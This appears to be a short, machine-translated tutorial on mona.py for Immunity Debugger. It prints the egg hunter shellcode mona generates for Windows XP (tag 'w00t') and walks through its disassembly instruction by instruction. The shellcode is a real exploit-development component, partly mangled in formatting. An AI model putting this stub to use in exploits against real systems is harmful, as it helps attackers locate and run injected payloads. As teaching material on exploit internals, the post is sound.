Mona is a plug-in for Immunity Debugger. It has powerful functions and can help exploit programmers quickly find the desired command sequence and many useful Memory search functions. The egg hunter code generation function is available. The default generation result is as follows:
========================================================== ==========================================================
Output generated by mona. py v1.1
Corelan Team-http://www.corelan.be
========================================================== ==========================================================
OS: xp, release 5.1.2600
Process being debugged: php (pid 15016)
========================================================== ==========================================================
22:20:41
========================================================== ==========================================================
Egghunter, tag w00t:
"\ X66 \ x81 \ xca \ xff \ x0f \ x42 \ x52 \ x6a \ x02 \ x58 \ xcd \ x2e \ x3c \ x05 \ x5a \ x74"
"\ Xef \ xb8 \ x77 \ x30 \ x30 \ x74 \ x8b \ xfa \ xaf \ x75 \ xea \ xaf \ x75 \ xe7 \ xff \ xe7"
Put this tag in front of your shellcode: w00tw00t
After debugging this command sequence in OD, you can sort out the following code:
00406030 66: 81CA FF0F or dx, 0FFF; generate an initial value of edx
00406035 42 inc edx; move EDX --- code
00406036 52 push edx; save EDX to the stack
00406037 6A 02 PUSH 2;
00406039 58 pop eax; send 2 to eax, which is the system call number
0040603A CD 2E INT 2E;
0040603C 3C 05 cmp al, 5; the system calls INT 2E and compares whether AL is 5. Note that if the value in EDX is not writable, EAX = C0000005 or C00000C5
0040603E 5A pop edx; restore the EDX Value
0040603F ^ 74 ef je short shellcod.00406030; if [EDX] cannot be written, jump to code
00406041 B8 77303074 mov eax, 74303077
00406046 8BFA mov edi, EDX
00406048 af scas dword ptr es: [EDI]; check whether the memory pointed by EDI is EAX Value
00406049 ^ 75 ea jnz short shellcod.00406035;
0040604B af scas dword ptr es: [EDI]; if you continue to judge whether the directed memory is EAX value (note that 4 is added to EDI after SCAS)
0040604C ^ 75 E7 jnz short shellcod.00406035; if not, jump to code
0040604E FFE7 jmp edi; find egg, jump to the found code and execute
From painful beliefs